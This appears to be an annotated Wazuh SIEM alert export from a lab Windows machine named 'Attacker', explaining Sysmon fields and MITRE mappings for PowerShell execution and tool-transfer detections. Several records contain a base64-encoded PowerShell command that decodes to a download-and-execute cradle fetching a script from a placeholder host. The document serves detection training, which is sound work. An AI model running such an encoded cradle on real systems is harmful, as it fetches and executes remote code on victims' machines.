decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:19.9724799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282718
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:19.900 ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} ProcessId: 12012 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_igv42wmh.ctb.ps1 CreationUtcTime: 2025-04-24 22:36:19.900 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:19.900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce1-680a-dc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_igv42wmh.ctb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:19.900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.071+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.071+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1142671
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:22.1640650Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282752
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:21.060 ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} ProcessId: 10556 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} ParentProcessId: 12012 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:21.060
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce5-680a-df0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10556
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce1-680a-dc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.078+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.078+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1150742
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:22.3308890Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282753
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:22.313 ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} ProcessId: 10556 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_afeyzpts.2r4.ps1 CreationUtcTime: 2025-04-24 22:36:22.313 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:22.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce5-680a-df0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10556
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_afeyzpts.2r4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:22.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.270+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.270+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1153511
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:23.3718738Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282772
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:22.844 ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} ProcessId: 2804 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} ParentProcessId: 10556 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:22.844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce6-680a-e10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2804
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce5-680a-df0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10556
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.285+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.285+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1161578
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
